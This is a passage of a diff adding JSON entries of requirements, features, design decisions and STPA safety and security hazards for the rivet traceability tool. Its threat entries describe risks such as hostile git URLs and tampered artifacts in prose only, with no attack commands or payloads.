+      "title": "Document pages in HTML export with resolved wiki-links and embeds",
+      "type": "feature"
+    },
+    {
+      "description": "New artifact kind \"feature-model\" with YAML structure for FODA-style feature trees. Supports group types (mandatory, optional, alternative, or), feature hierarchy (parent/children), and cross-tree constraints as s-expressions. Schema validation ensures well-formedness: no cycles in feature tree, valid group types, parseable constraints.\n",
+      "id": "FEAT-110",
+      "links": [
+        {
+          "target": "REQ-042",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-050",
+          "type": "implements"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "variant",
+        "ple",
+        "feature-model",
+        "phase-3"
+      ],
+      "title": "Feature model schema and parser",
+      "type": "feature"
+    },
+    {
+      "description": "Uses yaml-section and shorthand-links schema metadata to parse section-based YAML formats. One function replaces the 861-line hardcoded STPA adapter. Handles generic and section formats.\n",
+      "id": "FEAT-095",
+      "links": [
+        {
+          "target": "REQ-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Schema-driven YAML extraction (Phase 3)",
+      "type": "feature"
+    },
+    {
+      "description": "Use the petgraph crate for building and querying the artifact link graph (cycle detection, reachability, orphan detection).\n",
+      "id": "DD-002",
+      "links": [
+        {
+          "target": "REQ-004",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture"
+      ],
+      "title": "petgraph for link graph operations",
+      "type": "design-decision"
+    },
+    {
+      "description": "Defines the [externals] block in rivet.yaml where each external repo is declared with a name, git URL, ref, and artifact path. Resolves prefix:ID syntax in link targets to locate artifacts in the corresponding external repository.\n",
+      "id": "FEAT-033",
+      "links": [
+        {
+          "target": "REQ-020",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cross-repo"
+      ],
+      "title": "Externals config block and prefix resolution",
+      "type": "feature"
+    },
+    {
+      "description": "Lossless, span-preserving YAML parser using rowan. 28 SyntaxKind variants, hand-written lexer and recursive-descent parser with indent tracking. Round-trip guarantee for all project YAML files.\n",
+      "id": "FEAT-093",
+      "links": [
+        {
+          "target": "REQ-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Rowan YAML CST parser (Phase 1)",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "UCA-VAR-004",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        },
+        {
+          "target": "H-VAR-004",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "S-expression evaluator applies wrong quantifier scope in nested expressions",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CC-VAR-001",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-VAR-001",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-VAR-001",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "validate --variant must require binding model presence",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nReqIF adapter aborts import after encountering a parse error\n\nin one SpecObject,\ndiscarding all subsequent SpecObjects.\n",
+      "id": "UCA-Q-7",
+      "links": [
+        {
+          "target": "H-2",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-REQIF",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nMCP server does not reload project state between tool calls,\n\nreturning stale validation results after files change.\n",
+      "id": "UCA-M-1",
+      "links": [
+        {
+          "target": "H-IMPL-003",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CLI",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CC-C-27",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-27",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-20",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nOutput artifacts:\ncoverage matrices,\ncompliance reports,\n\nvalidation summaries,\nReqIF exports.  Consumed by auditors,\n\nproject managers,\nand downstream tools.\n",
+      "id": "PROC-REPORTS",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generated Reports and Metrics",
+      "type": "controlled-process"
+    },
+    {
+      "description": "Cross-repo links use prefix:ID syntax (e.g., rivet:REQ-001) rather than full URIs. Simpler to type, more readable in YAML.\n",
+      "id": "DD-014",
+      "links": [
+        {
+          "target": "REQ-020",
+          "type": "satisfies"
+        }
+      ],
+      "status": "accepted",
+      "tags": [
+        "cross-repo"
+      ],
+      "title": "Prefixed IDs over URI-style references",
+      "type": "design-decision"
+    },
+    {
+      "description": "An attacker modifies snapshot files or YAML artifacts to change validation results, making non-compliant deliverables appear compliant.\n",
+      "id": "SL-IMPL-001",
+      "links": [],
+      "status": "draft",
+      "tags": [],
+      "title": "Unauthorized modification of compliance artifacts",
+      "type": "sec-loss"
+    },
+    {
+      "description": "The core validation engine does not provide size or depth limits when parsing YAML artifact files, accepting arbitrarily large or deep inputs.\n",
+      "id": "SUCA-CORE-1",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        },
+        {
+          "target": "SH-6",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Validation engine does not enforce limits on YAML input size or depth",
+      "type": "sec-uca"
+    },
+    {
+      "description": "YAML parsing must be configured with an expansion limit (to prevent YAML aliases/anchors from producing exponential structures) and a maximum document size.  ReqIF parsing must limit document depth and total node count.  Input that exceeds limits must be rejected with a clear diagnostic, not silently truncated or allowed to exhaust memory.\n",
+      "id": "SSC-6",
+      "links": [
+        {
+          "target": "SH-6",
+          "type": "prevents-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Rivet must enforce resource limits on YAML and ReqIF parsing",
+      "type": "sec-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-M-3",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-M-3",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        },
+        {
+          "target": "H-IMPL-003",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nFormal verification must prove properties of the actual compiled\n\ncode,\nnot a separate model. Kani harnesses must call the real\n\nfunctions. Verus annotations must be on the real implementations.\n\nRocq specifications must be generated from or validated against\n\nthe Rust source via coq-of-rust,\nnot hand-written independently.\n",
+      "id": "SC-14",
+      "links": [
+        {
+          "target": "H-12",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet formal proofs must be validated against the implementation under test",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Import adapter for sphinx-needs needs.json export format. Reads needs.json, applies configurable type-mapping and id-transform rules from rivet.yaml, and produces rivet artifacts with mapped types, converted links, and preserved fields. Handles sphinx-needs specifics like nested content, docname metadata, and underscore IDs.\n",
+      "id": "FEAT-042",
+      "links": [
+        {
+          "target": "REQ-025",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-020",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "adapter",
+        "interchange",
+        "migration",
+        "phase-3"
+      ],
+      "title": "sphinx-needs JSON adapter (needs-json)",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe CI workflow captures the current snapshot AFTER the\n\ncompliance report is generated. The compliance report uses\n\nthe snapshot already in the repo (from the previous release).\n",
+      "id": "SC-IMPL-002",
+      "links": [
+        {
+          "target": "H-IMPL-002",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Delta MUST compare against the PREVIOUS release snapshot",
+      "type": "system-constraint"
+    },
+    {
+      "description": "YAML artifact file editing uses indentation-aware parser per YAML 1.2.2 spec for lossless modification.\n",
+      "id": "REQ-034",
+      "links": [
+        {
+          "target": "SC-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "yaml",
+        "parsing",
+        "spec-compliance"
+      ],
+      "title": "YAML 1.2.2 spec-compliant artifact file editing",
+      "type": "requirement"
+    },
+    {
+      "description": "Distribute rivet as a Bazel module (rules_rivet) with a rivet_validate() test rule, and as a Nix flake with binary package output. The Bazel rule runs rivet validate as a bazel test target without pulling Sphinx, Python, LLVM, or JDK into the dependency graph. The Nix flake provides nix run and nix develop integration.\n",
+      "id": "FEAT-045",
+      "links": [
+        {
+          "target": "REQ-027",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "packaging",
+        "bazel",
+        "nix",
+        "phase-3"
+      ],
+      "title": "rules_rivet Bazel module and Nix flake",
+      "type": "feature"
+    },
+    {
+      "description": "Dashboard SVG graph views (link graph, STPA control structure, AADL diagrams) get a dedicated viewer with fullscreen toggle (F11 or button), pop-out to separate browser window, resizable container with drag handles, zoom-to-fit button, and minimap for large graphs. Currently SVGs are rendered inline with fixed dimensions and no way to enlarge or isolate them.\n",
+      "id": "FEAT-057",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "dashboard",
+        "ui",
+        "graph",
+        "phase-3"
+      ],
+      "title": "SVG graph viewer with fullscreen, resize, and pop-out",
+      "type": "feature"
+    },
+    {
+      "description": "\nCore commit analysis extracts false-positive artifact IDs from\n\ntrailer values that match the PREFIX-DIGITS pattern but are not\n\nactual artifact identifiers.\n",
+      "id": "UCA-C-18",
+      "links": [
+        {
+          "target": "H-15",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "The system must discover cross-repo dependencies from build system manifests (Bazel MODULE.bazel, Nix flake.lock, or custom manifests) rather than requiring manual external declarations. This includes resolving pinned commits, workspace paths, and source code locations across the dependency graph for traceability validation and source code linking.\n",
+      "id": "REQ-027",
+      "links": [
+        {
+          "target": "SC-10",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-20",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-15",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-16",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-17",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cross-repo",
+        "bazel",
+        "nix",
+        "traceability"
+      ],
+      "title": "Build-system-aware cross-repo discovery",
+      "type": "requirement"
+    },
+    {
+      "description": "The s-expression language compiles internally to Datalog relations and is evaluated using semi-naive evaluation. This guarantees termination for all queries (unlike Prolog) while supporting transitive closure, negation-as-failure, and incremental evaluation.\n",
+      "id": "DD-049",
+      "links": [
+        {
+          "target": "REQ-041",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-043",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Datalog semantics with termination guarantee",
+      "type": "design-decision"
+    },
+    {
+      "description": "Repos tag themselves with baseline/* tags; consistency verified not enforced.\n",
+      "id": "DD-016",
+      "links": [
+        {
+          "target": "REQ-021",
+          "type": "satisfies"
+        }
+      ],
+      "status": "accepted",
+      "tags": [
+        "cross-repo",
+        "baseline"
+      ],
+      "title": "Distributed baselining over centralized manifest",
+      "type": "design-decision"
+    },
+    {
+      "description": "Renders artifact description fields as Markdown using pulldown-cmark. Supports headings, lists, code blocks, links, and emphasis in both the dashboard detail view and document generation output.\n",
+      "id": "FEAT-058",
+      "links": [
+        {
+          "target": "REQ-032",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-029",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "rendering",
+        "markdown",
+        "phase-3"
+      ],
+      "title": "Markdown rendering for artifact descriptions via pulldown-cmark",
+      "type": "feature"
+    },
+    {
+      "description": "Machine-readable JSON output envelope available on all CLI commands (validate, list, stats, matrix, diff, coverage, schema, docs). Enables agents and CI pipelines to consume rivet output programmatically.\n",
+      "id": "FEAT-025",
+      "links": [
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "agent",
+        "phase-2"
+      ],
+      "title": "--format json on all commands",
+      "type": "feature"
+    },
+    {
+      "description": "\nTwo different diagnostic messages produce the same FNV-1a\n\nhash,\ncausing the convergence tracker to conflate unrelated\n\nfailures and give wrong escalation.\n",
+      "id": "H-IMPL-006",
+      "links": [
+        {
+          "target": "L-IMPL-004",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Failure signature hash collision",
+      "type": "hazard"
+    },
+    {
+      "description": "",
+      "id": "CC-D-1",
+      "links": [
+        {
+          "target": "CTRL-DASH",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-D-1",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        },
+        {
+          "target": "H-6",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-C-21",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-21",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-14",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Test suite organized to mirror ASPICE verification levels. SWE.4 unit verification (proptest, Miri), SWE.5 integration verification (cross-module tests), SWE.6 qualification testing (full pipeline validation, benchmark KPIs).\n",
+      "id": "REQ-014",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "aspice"
+      ],
+      "title": "ASPICE SWE.4/5/6 test structure",
+      "type": "requirement"
+    },
+    {
+      "description": "All crates declare edition = \"2024\" and rust-version = \"1.85\" in Cargo.toml. The CI pipeline includes an explicit MSRV check step that compiles with the minimum toolchain to prevent accidental regressions.\n",
+      "id": "FEAT-064",
+      "links": [
+        {
+          "target": "REQ-011",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "toolchain",
+        "ci",
+        "phase-2"
+      ],
+      "title": "Rust edition 2024 and MSRV 1.85 enforcement via Cargo.toml and CI",
+      "type": "feature"
+    },
+    {
+      "description": "Integration tests for schema loading and merging. Verifies that common + stpa + aspice merge preserves all artifact types, link types, and inverse mappings. Includes cybersecurity schema merge verification and ASPICE traceability rule enforcement.\n",
+      "id": "TEST-003",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-004",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "schema",
+        "swe-5"
+      ],
+      "title": "Schema validation and merge tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nFeature \"pedestrian-detection\" binds to [REQ-042,\nREQ-043,\nSPEC-021].\n\nDuring a refactoring,\nSPEC-021 is deleted and replaced by SPEC-025.\n\nThe binding file is not updated. Variant validation counts SPEC-021\n\nas bound (it's in the binding) but the artifact doesn't exist,\nso\n\nno traceability check runs on it. The feature appears fully covered\n\nwhen it actually has a gap. This is detected only if binding validation\n\nchecks artifact existence before scoping.\n",
+      "id": "LS-VAR-002",
+      "links": [
+        {
+          "target": "UCA-VAR-003",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-VAR-003",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Binding references deleted artifact — phantom coverage",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "In-memory store holding all loaded artifacts. Provides lookup by ID, type filtering, and iteration.\n",
+      "id": "ARCH-CORE-STORE",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "aadl",
+        "architecture",
+        "core",
+        "store"
+      ],
+      "title": "Artifact Store",
+      "type": "aadl-component"
+    },
+    {
+      "description": "GitHub Actions workflow captures snapshot on v* tag push. Commits to main for future delta comparison. Compliance report uses previous snapshot for delta rendering.\n",
+      "id": "FEAT-079",
+      "links": [
+        {
+          "target": "REQ-035",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "CI snapshot workflow on release tag",
+      "type": "feature"
+    },
+    {
+      "description": "\nDiagnostic positions must be computed from the rowan CST span\n\ninformation,\nnot from line-scanning heuristics. Each diagnostic's\n\nstart/end positions must fall within the artifact's CST node range.\n",
+      "id": "SC-LSP-003",
+      "links": [
+        {
+          "target": "H-LSP-003",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "LSP must report diagnostics at the correct byte range from the rowan CST",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Manages external project dependencies, cross-repo artifact linking via prefixed IDs, distributed baselining, and sync operations.\n",
+      "id": "ARCH-CORE-EXTERNALS",
+      "links": [
+        {
+          "target": "REQ-020",
+          "type": "allocated-from"
+        },
+        {
+          "target": "REQ-021",
+          "type": "allocated-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "cross-repo"
+      ],
+      "title": "Cross-Repository Linking Engine",
+      "type": "aadl-component"
+    },
+    {
+      "description": "The validation engine's core functions are annotated with Verus requires/ensures contracts proving soundness (PASS implies all rules satisfied) and completeness (rule violation implies diagnostic emitted). Verus uses SMT solving for automated proof discharge.\n",
+      "id": "DD-026",
+      "links": [
+        {
+          "target": "REQ-030",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "formal-verification",
+        "verus"
+      ],
+      "title": "Verus inline proofs for validation soundness and completeness",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nCI uses aggressive caching to speed up builds.  The cache key\n\nincludes the Cargo.lock hash but not the artifact YAML content.\n\nWhen artifact files change but Cargo.lock does not,\nCI restores\n\na cached target/ directory that may include stale validation\n\nstate [UCA-I-4].  Validation appears to pass because it runs\n\nagainst cached data that does not reflect the current PR's\n\nchanges [H-1,\nH-3].\n",
+      "id": "LS-I-2",
+      "links": [
+        {
+          "target": "UCA-I-4",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "CI caches stale artifacts across workflow runs",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Each caller (serve, export, CLI) constructs an embed_resolver closure capturing its own context. This avoids coupling the document renderer to any specific data loading strategy.\n",
+      "id": "DD-042",
+      "links": [
+        {
+          "target": "REQ-035",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Closure-based embed resolver in render_to_html",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nExternal repo paths in rivet.yaml may be relative (git submodule),\n\nabsolute (differ across Linux/macOS/Windows),\nor local paths that\n\ndon't exist on CI runners.  If path resolution fails silently,\n\ncross-repo links break without warning and traceability is lost.\n",
+      "id": "H-18",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-3",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet fails to resolve external repository paths across platforms",
+      "type": "hazard"
+    },
+    {
+      "description": "",
+      "id": "CC-VAR-005",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-VAR-005",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-VAR-001",
+          "type": "prevents"
+        },
+        {
+          "target": "H-VAR-003",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "CLI must report binding coverage in variant validation output",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "CI test runs produce structured results (JUnit XML) that are imported into rivet as test result artifacts. The workflow is: run tests, import results via rivet import --format junit, create a test report artifact in results/, conformance review, commit report as PR, include in release. Test evidence becomes part of the traceability chain — rivet dogfoods its own test tracking.\n",
+      "id": "REQ-040",
+      "links": [],
+      "status": "draft",
+      "tags": [
+        "testing",
+        "ci",
+        "dogfood",
+        "future"
+      ],
+      "title": "Test report lifecycle integration",
+      "type": "requirement"
+    },
+    {
+      "description": "Render AADL component diagrams in the dashboard using a spar WASM module compiled for the browser. Provides interactive visualization of system/software architecture with drill-down into subcomponents.\n",
+      "id": "FEAT-020",
+      "links": [
+        {
+          "target": "REQ-008",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "aadl",
+        "wasm",
+        "ui",
+        "phase-3"
+      ],
+      "title": "AADL browser rendering (spar WASM)",
+      "type": "feature"
+    },
+    {
+      "description": "Schemas compiled into the binary via include_str! with fallback loading when the schemas/ directory is not found on disk. Enables zero-configuration operation without requiring schema files to be shipped alongside the binary.\n",
+      "id": "FEAT-021",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "schema",
+        "distribution",
+        "phase-2"
+      ],
+      "title": "Embedded schemas",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe externals module (externals.rs) executes `git clone` and\n\n`git fetch` commands against URLs specified in the project's\n\nrivet.yaml configuration. A malicious or compromised rivet.yaml\n\ncould specify a git URL pointing to a hostile repository. The\n\nclone/fetch operation may trigger git hooks,\ndownload large\n\nvolumes of data,\nor overwrite local state in the cache directory.\n\nIn a worst-case environment where rivet.yaml is modified in a\n\nsupply chain attack,\nthe sync command becomes a vector for\n\narbitrary code execution via git hooks.\n",
+      "id": "H-17",
+      "links": [
+        {
+          "target": "L-3",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet cross-repo sync clones arbitrary git repositories specified in rivet.yaml",
+      "type": "hazard"
+    },
+    {
+      "description": "\nThe diagnostic is real but points to the wrong line,\nwrong file,\n\nor wrong artifact. User cannot find and fix the actual issue.\n",
+      "id": "H-LSP-003",
+      "links": [
+        {
+          "target": "L-LSP-002",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "LSP diagnostic points to wrong location or file",
+      "type": "hazard"
+    },
+    {
+      "description": "\nCore applies conditional validation rules that contradict each\n\nother on the same artifact.\n",
+      "id": "UCA-C-12",
+      "links": [
+        {
+          "target": "H-10",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nThe salsa incremental computation engine fails to invalidate a\n\ncached validation result when an upstream input changes. The\n\nvalidation reports PASS based on the previous state while the\n\ncurrent state contains violations. In a worst-case environment\n\nwhere CI trusts incremental results,\nthis silently passes a\n\nbroken traceability state.\n",
+      "id": "H-9",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet incremental validation returns stale results due to missed invalidation",
+      "type": "hazard"
+    },
+    {
+      "description": "",
+      "id": "CC-L-5",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-L-5",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-5",
+          "type": "prevents"
+        },
+        {
+          "target": "H-7",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "UCA-VAR-005",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "issued-by"
+        },
+        {
+          "target": "H-VAR-001",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-VAR-003",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "CLI reports variant validation PASS without indicating that binding coverage is incomplete",
+      "type": "uca"
+    },
+    {
+      "description": "Hand-rolled or nom-based parser for s-expressions. Produces a typed AST: atoms (string, integer, float, boolean, wildcard, symbol), lists, and special forms (and, or, not, implies, forall, exists, etc.). Parser produces span information for error reporting. Approximately 200 lines of parser + 100 lines of AST types.\n",
+      "id": "FEAT-106",
+      "links": [
+        {
+          "target": "REQ-041",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-048",
+          "type": "implements"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "s-expression",
+        "parser",
+        "phase-1"
+      ],
+      "title": "S-expression parser and AST",
+      "type": "feature"
+    },
+    {
+      "description": "\nMultiple sources (local edits,\nOSLC sync,\nReqIF import) modify the\n\nsame artifact simultaneously.  Without conflict detection,\nthe last\n\nwriter wins,\nsilently overwriting safety-relevant changes.\n",
+      "id": "H-5",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-3",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-6",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet fails to detect conflicting concurrent modifications",
+      "type": "hazard"
+    },
+    {
+      "description": "\nAn external repository's artifacts change (new commit fetched),\n\nbut the salsa queries for cross-repo link resolution are not\n\ninvalidated. Broken cross-repo links are not detected.\n",
+      "id": "H-9.2",
+      "links": [
+        {
+          "target": "H-9",
+          "type": "refines"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet salsa database does not invalidate cross-repo link validation on external changes",
+      "type": "sub-hazard"
+    },
+    {
+      "description": "The adversary gains write access to the git remote hosting Rivet's artifact repository.  They replace safety/stpa/hazards.yaml with a version that removes H-3 (incorrect coverage metrics) and adds a false system-constraint asserting coverage is complete.  On next 'rivet validate', Rivet loads the adversary-controlled artifacts, the removed hazard causes no missing-constraint warning, and 'rivet stats' shows 100% coverage.  Engineers and auditors accept the falsified report.\n",
+      "id": "SLS-1",
+      "links": [
+        {
+          "target": "SUCA-CLI-1",
+          "type": "caused-by-sec-uca"
+        },
+        {
+          "target": "SH-1",
+          "type": "leads-to-sec-hazard"
+        },
+        {
+          "target": "SH-2",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Git remote compromise — adversary replaces safety artifact files",
+      "type": "sec-scenario"
+    },
+    {
+      "description": "Schema definitions must align with Automotive SPICE v4.0 process reference model. SWE.5 is \"Software Component Verification and Integration Verification\", SWE.6 is \"Software Verification\". Use \"verification measure\" terminology instead of \"test\". Expanded method values (static-analysis, formal-verification, simulation, inspection, walkthrough). Verification-criteria field on requirement types.\n",
+      "id": "REQ-015",
+      "links": [
+        {
+          "target": "SC-4",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-4",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "aspice",
+        "schema"
+      ],
+      "title": "ASPICE 4.0 aligned schemas",
+      "type": "requirement"
+    },
+    {
+      "description": "Use criterion.rs for performance benchmarks. Benchmark store operations, link graph building, validation, and matrix computation at 100/1000/10000 artifact scales to establish KPI baselines.\n",
+      "id": "DD-009",
+      "links": [
+        {
+          "target": "REQ-013",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "performance"
+      ],
+      "title": "Criterion benchmarks as KPI baselines",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nWhen a YAML file fails to parse,\nthe LSP MUST surface a\n\nyaml-parse-error diagnostic with file,\nline,\nand column.\n\nIt MUST NOT silently return empty results.\n",
+      "id": "SC-LSP-001",
+      "links": [
+        {
+          "target": "H-LSP-001",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Parse errors MUST produce diagnostics, not empty results",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Rowan-based lossless parser for SysML v2 textual notation. Same architecture as spar-parser (AADL): grammar definition, lexer, parser with error recovery, rowan CST. Covers KerML kernel library and SysML v2 language constructs including requirements, constraints, use cases, and allocations.\n",
+      "id": "FEAT-067",
+      "links": [
+        {
+          "target": "REQ-037",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "sysml",
+        "parser",
+        "future"
+      ],
+      "title": "SysML v2 parser (spar-sysml2 crate)",
+      "type": "feature"
+    },
+    {
+      "description": "Product line engineering uses three separate artifact layers: (1) Feature model — logical problem space, no implementation details. (2) Variant configurations — specific feature selections. (3) Binding model — maps features to artifacts and source globs. Each layer is maintained independently by different roles.\n",
+      "id": "DD-050",
+      "links": [
+        {
+          "target": "REQ-042",
+          "type": "satisfies"
+        },
+        {
